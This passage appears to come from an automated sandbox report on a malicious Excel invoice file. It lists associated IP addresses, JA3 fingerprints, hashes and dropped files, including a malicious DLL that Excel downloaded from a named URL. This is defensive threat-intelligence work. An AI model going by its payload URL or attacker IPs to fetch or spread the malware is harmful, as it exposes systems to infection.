                                                                                                                          • 80.86.91.27
                                                                                                                          l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          ymuyks.dllGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          s3CRQNulKZ.exeGet hashmaliciousBrowse
                                                                                                                          • 217.172.179.54
                                                                                                                          DFR2154747.vbeGet hashmaliciousBrowse
                                                                                                                          • 85.25.93.233
                                                                                                                          r8a97.exeGet hashmaliciousBrowse
                                                                                                                          • 62.75.168.106
                                                                                                                          NKsplucdAu.exeGet hashmaliciousBrowse
                                                                                                                          • 217.172.179.54
                                                                                                                          TELEPOINTBGspetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                                                                          • 79.124.76.20
                                                                                                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                                                                          • 79.124.76.20
                                                                                                                          document-1932597637.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1932597637.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1961450761.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1909441643.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1961450761.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1909441643.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1942925331.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1942925331.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1892683183.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1892683183.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1909894964.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1909894964.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1965918496.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1965918496.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1901557343.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1901557343.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1958527977.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          document-1958527977.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.152.52
                                                                                                                          SENTIANLInv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          xad05r9ba.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          mcluc5u.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          hiytvys.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          ymuyks.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                          • 5.100.228.233
                                                                                                                          anthon.exeGet hashmaliciousBrowse
                                                                                                                          • 145.131.21.142
                                                                                                                          baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                          • 91.216.141.46
                                                                                                                          p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                          • 91.216.141.46
                                                                                                                          IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                          • 91.216.141.46

                                                                                                                          JA3 Fingerprints

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          7dcce5b76c8b17472d024758970a406bInv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          ACH PAYMENT REMlTTANCE.xlsxGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          FedEx 772584418730.docGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.18733.rtfGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          PURCHASE ORDER-34002174.docGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtfGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          n#U00b0 761.docGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          swift 0182021.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          prints-eduardo-bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          New PO.docGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          Recibo de la transaccion.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          Xeron_Scan2021002111002.docGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          INFO.xlsGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          SWIFT_075.dotmGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          Order-Detail-17534.docGet hashmaliciousBrowse
                                                                                                                          • 217.174.149.3
                                                                                                                          eb88d0b3e1961a0562f006e5ce2a0b87Inv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          Document74269.xlsGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          Document74269.xlsGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          SecuriteInfo.com.Heur.15645.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          Statement_1857_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          Statement_9505_of_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          MSC printouts of outstanding as of 73221_12_09_2020.xlsmGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37
                                                                                                                          Invoice.29002611.docGet hashmaliciousBrowse
                                                                                                                          • 77.220.64.37

                                                                                                                          Dropped Files

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          C:\Users\user\AppData\Local\Temp\bjcbglsw.dllInv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rarInv0209966048-20210111075675.xlsGet hashmaliciousBrowse

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                              Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):914
                                                                                                                              Entropy (8bit):7.367371959019618
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                                                                                                                              MD5:E4A68AC854AC5242460AFD72481B2A44
                                                                                                                              SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                                                                                                                              SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                                                                                                                              SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):58936
                                                                                                                              Entropy (8bit):7.994797855729196
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):893
                                                                                                                              Entropy (8bit):7.366016576663508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                                                              MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                                                              SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                                                              SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                                                              SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                                                              Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):252
                                                                                                                              Entropy (8bit):3.0892951054004123
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:kKOLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:mLutWOxSW0zeYrsMlU/
                                                                                                                              MD5:FE23BA5105EB158BC8E552EF75D10B1B
                                                                                                                              SHA1:B7E4B32FCEA4D0B9AB6071C590831B5A457F6C1B
                                                                                                                              SHA-256:70DA58207CD584902854310036CDB9A756E7E1ED4582C0CB72BF6F63EC54B75F
                                                                                                                              SHA-512:AA2E433B5AA47F3CBC5C66E0429B3C0A95D07B72090A59BD19E26C1554FBB42E4AF4DD4ADF705F09A5FE8FCBB961941A6AFC32CA376591529C1872EAA18EEE70
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: p...... ....j...P>C.....(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):326
                                                                                                                              Entropy (8bit):3.1170519944677504
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:kKVQSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:dQdkPlE99SNxAhUegeT2
                                                                                                                              MD5:DC1DDCE028A6E4009ECC19B5D307C7A2
                                                                                                                              SHA1:1C1827D553B039B897EC1F859B846BE5FC60ECC1
                                                                                                                              SHA-256:36BE217EF1F7FB8E9B9E623F9FA4BE4BC35BB3115A31CBC20578B48E5C3154DA
                                                                                                                              SHA-512:7323ADA578ED7ED97708CE770CC73B6FB9BB03998779B80A782F8ECB89DFA93A098ACFF608C1701E1853C093C68EF6DDAF261BA4805D664FA744D5384189D26F
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: p...... ..........8.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):252
                                                                                                                              Entropy (8bit):3.0294634724686764
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:kkFklUkfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK9aliBAIdQZV7eAYLit
                                                                                                                              MD5:B119074602F54E16628B91ECA8C7DF98
                                                                                                                              SHA1:E0DD8529DD30F418C5D16DBECCCA703DB5E298BA
                                                                                                                              SHA-256:621F88E559F9B4602388D2349D27A3E420D84B909B38A56254A5B45986190ED4
                                                                                                                              SHA-512:D8F274623DE79B3AE675A6804CCD49163746B4BC9DF4D47BEABFE61EFC717696E319B8032C31E7A4CDC4B4701A4CAC96B0EB8977D3C2ADB1F7298AA7D9145D87
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: p...... ....`..........(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):319488
                                                                                                                              Entropy (8bit):7.125176562164236
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
                                                                                                                              MD5:597B02A17B8C012E25FA0A668004163B
                                                                                                                              SHA1:424A6F131D5C765EFDB28E5CAAE5FE2834A82BB0
                                                                                                                              SHA-256:E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
                                                                                                                              SHA-512:C75D875F3ABE620779380E7AE0F4BBB59B0C823B40889084B51396CD166187CBD90F7FB4159969DF1C7C241930BAA93BD051BF2F8FFF9CB8402D00CFB60062D4
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: Inv0209966048-20210111075675.xls, Detection: malicious, Browse
                                                                                                                              Reputation:low
                                                                                                                              IE Cache URL:https://media-server.skyinternet.com.pk/hhsz1e0.rar
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:._...........!...2.z...b.......&.......@...............................@..........................................................|....................0.......................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.6....p.......2..............@..@.data................4..............@....text4...R.......T...R.............. ..@.rsrc...|........0..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F82396A.emf
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1408
                                                                                                                              Entropy (8bit):2.270567557934206
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                                                                                                                              MD5:40550DC2F9D56285FA529159B8F2C6A5
                                                                                                                              SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                                                                                                                              SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                                                                                                                              SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                                                                                                                              Malicious:false
                                                                                                                              Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7D72663.png
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:PNG image data, 363 x 234, 8-bit colormap, non-interlaced
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2653
                                                                                                                              Entropy (8bit):7.818766151665501
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
                                                                                                                              MD5:30D3FFA1E30B519FD9B1B839CC65C7BE
                                                                                                                              SHA1:1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
                                                                                                                              SHA-256:89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
                                                                                                                              SHA-512:88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
                                                                                                                              Malicious:false
                                                                                                                              Preview: .PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_0965a757\Report.wer
                                                                                                                              Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):17342
                                                                                                                              Entropy (8bit):3.709621429417914
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:204KBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOBJ:2LJBKzFCEuhTlyZVaPJVaJa5GG
                                                                                                                              MD5:5BDAEAEE4662B05799D7D65D0AB0D87E
                                                                                                                              SHA1:66D091A1DA92DE816B61878ADE3A40DF07998DE0
                                                                                                                              SHA-256:4BFB16E21FAC9F203FB580EA3EED2E3C766B6CA6EB6DE9DF499F5E30BFE53998
                                                                                                                              SHA-512:4B59466997CBB3745D9352732A17EC72357EF2134F7DA374A94DB28ACD1C74442658B4FAA07DEEF420C59CB11ED671055C13C080790734CF90774DBF737194CF
                                                                                                                              Malicious:false
